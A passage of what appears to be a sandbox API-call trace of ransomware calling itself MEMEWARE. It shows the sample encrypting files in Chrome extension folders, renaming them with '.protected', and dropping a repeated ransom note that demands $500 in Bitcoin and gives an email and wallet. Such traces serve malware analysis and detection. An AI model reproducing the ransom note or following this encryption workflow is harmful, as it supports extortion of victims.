(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.503] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.504] lstrlenA (lpString="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") returned 684 [0080.504] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0080.504] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.504] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.504] CloseHandle (hObject=0x164) returned 1 [0080.504] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.504] lstrcmpiW (lpString1="gu", lpString2="Windows") returned -1 [0080.504] lstrcmpiW (lpString1="gu", lpString2="Program Files") returned -1 [0080.504] lstrcmpiW (lpString1="gu", lpString2="Program Files (x86)") returned -1 [0080.504] lstrcmpiW (lpString1="gu", lpString2="$Recycle.bin") returned 1 [0080.504] lstrcmpiW (lpString1="gu", lpString2="System Volume Information") returned -1 [0080.504] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu") returned 141 [0080.504] lstrcmpW (lpString1="gu", lpString2=".") returned 1 [0080.504] lstrcmpW (lpString1="gu", lpString2="..") returned 1 [0080.504] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\*") returned 143 [0080.504] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.505] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.505] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.505] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.505] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.505] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.505] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\.") returned 143 [0080.505] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.505] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.505] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.505] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.505] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.505] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.505] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.505] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\..") returned 144 [0080.505] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.505] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.505] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.505] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.505] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.505] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned 
-1 [0080.505] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.505] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.505] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json") returned 155 [0080.505] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.505] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.505] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.505] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.505] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.505] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json") returned 155 [0080.506] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.506] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json") returned 155 [0080.506] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.506] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json") returned 155 [0080.506] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.506] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x11e, lpOverlapped=0x0) returned 1 [0080.506] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffee2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.506] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x11e, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x11e, lpOverlapped=0x0) returned 1 [0080.507] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.507] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.507] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.507] CloseHandle (hObject=0x168) returned 1 [0080.507] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json.protected") returned 165 [0080.507] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\messages.json.protected")) returned 1 [0080.507] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.507] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.507] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\RESTORE_FILES.txt") returned 159 [0080.507] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\gu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.508] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.508] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.509] lstrlenA (lpString="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") returned 684 [0080.509] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0080.509] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.509] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.509] CloseHandle (hObject=0x164) returned 1 [0080.509] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.509] lstrcmpiW (lpString1="hi", lpString2="Windows") returned -1 [0080.509] lstrcmpiW (lpString1="hi", lpString2="Program Files") returned -1 [0080.509] lstrcmpiW (lpString1="hi", lpString2="Program Files (x86)") returned -1 [0080.509] lstrcmpiW (lpString1="hi", lpString2="$Recycle.bin") returned 1 [0080.509] lstrcmpiW (lpString1="hi", lpString2="System Volume Information") returned -1 [0080.509] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi") returned 141 [0080.509] lstrcmpW (lpString1="hi", lpString2=".") returned 1 [0080.509] lstrcmpW (lpString1="hi", lpString2="..") returned 1 [0080.509] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\*") returned 143 [0080.509] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0080.509] 
lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0080.509] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0080.509] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0080.509] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0080.509] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0080.509] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\.") returned 143 [0080.509] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0080.509] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.509] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0080.509] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0080.509] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0080.509] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0080.509] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0080.509] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\..") returned 144 [0080.509] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0080.510] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0080.510] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0080.510] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0080.510] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0080.510] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned 
-1 [0080.510] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0080.510] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0080.510] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json") returned 155 [0080.510] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0080.510] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0080.510] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0080.510] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0080.510] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0080.511] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json") returned 155 [0080.511] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0080.511] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json") returned 155 [0080.511] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0080.511] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json") returned 155 [0080.511] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0080.511] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x13e, lpOverlapped=0x0) returned 1 [0080.511] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xfffffec2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.511] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x13e, lpOverlapped=0x0) returned 1 [0080.512] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.512] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0080.512] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0080.512] CloseHandle (hObject=0x168) returned 1 [0080.512] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json.protected") returned 165 [0080.512] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\messages.json.protected")) returned 1 [0080.512] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0080.512] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0080.513] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\RESTORE_FILES.txt") returned 159 [0080.513] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0080.513] lstrlenA 
(lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0080.513] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0080.514] lstrlenA (lpString="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") returned 684 [0080.514] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) 
returned 1 [0080.514] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0080.514] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0080.514] CloseHandle (hObject=0x164) returned 1 [0080.514] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0080.514] lstrcmpiW (lpString1="hr", lpString2="Windows") returned -1 [0080.514] lstrcmpiW (lpString1="hr", lpString2="Program Files") returned -1 [0080.514] lstrcmpiW (lpString1="hr", lpString2="Program Files (x86)") returned -1 [0080.514] lstrcmpiW (lpString1="hr", lpString2="$Recycle.bin") 